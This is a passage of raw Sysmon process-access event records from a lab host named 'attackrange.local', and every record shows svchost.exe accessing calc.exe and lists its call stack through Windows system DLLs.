ws\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360866Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360865Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360864Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360863Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360862Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360861Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360860Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360859Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360858Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360857Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360856Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360855Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360854Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360853Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360852Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360851Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360850Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360849Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360848Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360847Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360846Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360845Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 